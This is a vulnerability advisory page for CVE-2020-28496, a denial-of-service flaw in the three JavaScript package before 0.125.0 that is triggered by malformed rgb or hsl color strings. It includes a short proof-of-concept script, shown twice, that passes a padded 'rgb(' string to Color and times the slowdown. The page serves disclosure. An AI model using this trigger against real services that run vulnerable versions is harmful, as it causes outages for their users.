This affects the package three before 0.125.0. This can happen when handling rgb or hsl colors. PoC: var three = require('three') function build_blank (n) { var ret = "rgb(" for (var i = 0; i < n; i++) { ret += " " } return ret + ""; } var Color = three.Color var time = Date.now(); new Color(build_blank(50000)) var time_cost = Date.now() - time; console.log(time_cost+" ms")
Advisories
Source ID Title
EUVD EUVD EUVD-2021-0655 This affects the package three before 0.125.0. This can happen when handling rgb or hsl colors. PoC: var three = require('three') function build_blank (n) { var ret = "rgb(" for (var i = 0; i < n; i++) { ret += " " } return ret + ""; } var Color = three.Color var time = Date.now(); new Color(build_blank(50000)) var time_cost = Date.now() - time; console.log(time_cost+" ms")
Github GHSA Github GHSA GHSA-fq6p-x6j3-cmmq Denial of service in three
Fixes

Solution

No solution given by the vendor.


Workaround

No workaround given by the vendor.

History

No history.

Projects

Sign in to view the affected projects.

cve-icon MITRE

Status: PUBLISHED

Assigner: snyk

Published:

Updated: 2024-09-17T01:01:31.663Z

Reserved: 2020-11-12T00:00:00

Link: CVE-2020-28496

cve-icon Vulnrichment

No data.

cve-icon NVD

Status : Modified

Published: 2021-02-18T15:15:13.360

Modified: 2024-11-21T05:22:54.547

Link: CVE-2020-28496

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

No data.

Weaknesses